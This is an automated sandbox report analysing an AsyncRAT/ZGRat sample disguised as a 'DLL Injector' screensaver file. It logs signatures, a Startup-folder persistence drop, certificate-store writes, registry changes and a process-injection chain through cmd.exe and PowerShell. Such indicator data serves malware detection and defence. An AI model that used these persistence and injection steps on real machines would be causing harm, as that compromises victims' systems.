Malware Analysis Report

2025-08-05 14:28

Sample ID 231123-ygl5esbg75
Target DLL Injector Resou_nls..scr
SHA256 3b2776d93feca48f02f530dff6a3d4d918d94ce4e61c249b9f51f24d1d090d74
Tags
upx asyncrat zgrat microsoftedg microsoftedge winlogon persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3b2776d93feca48f02f530dff6a3d4d918d94ce4e61c249b9f51f24d1d090d74

Threat Level: Known bad

The file DLL Injector Resou_nls..scr was found to be: Known bad.

Malicious Activity Summary

upx asyncrat zgrat microsoftedg microsoftedge winlogon persistence rat

AsyncRat

Detect ZGRat V1

ZGRat

Async RAT payload

Blocklisted process makes network request

Downloads MZ/PE file

Drops startup file

Loads dropped DLL

UPX packed file

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Program crash

Enumerates processes with tasklist

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: CmdExeWriteProcessMemorySpam

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-23 19:45

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-23 19:45

Reported

2023-11-23 19:48

Platform

win7-20231020-en

Max time kernel

150s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr" /S

Signatures

Downloads MZ/PE file

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Users\Admin\AppData\Local\Temp\JV0sMlrH4P.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe C:\Users\Admin\AppData\Local\Temp\JV0sMlrH4P.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\sln_auto_file C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\.sln C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\.sln\ = "sln_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\sln_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\sln_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\sln_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\sln_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2952504676-3105837840-1406404655-1000_CLASSES\sln_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\JV0sMlrH4P.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\JV0sMlrH4P.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1212 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 2556 wrote to memory of 268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2556 wrote to memory of 268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2556 wrote to memory of 268 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 1212 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 2916 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kbfZNSrCxk.exe
PID 2916 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kbfZNSrCxk.exe
PID 2916 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\kbfZNSrCxk.exe
PID 1212 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 756 wrote to memory of 2548 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\ejNKtmaS2q.exe
PID 756 wrote to memory of 2548 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\ejNKtmaS2q.exe
PID 756 wrote to memory of 2548 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\ejNKtmaS2q.exe
PID 1212 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 1564 N/A C:\Users\Admin\AppData\Local\Temp\DLL Injector Resou_nls..scr C:\Windows\system32\cmd.exe
PID 1564 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\EWMH14lt5V.exe
PID 1564 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\EWMH14lt5V.exe
PID 1564 wrote to memory of 2168 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\EWMH14lt5V.exe
PID 2548 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\ejNKtmaS2q.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
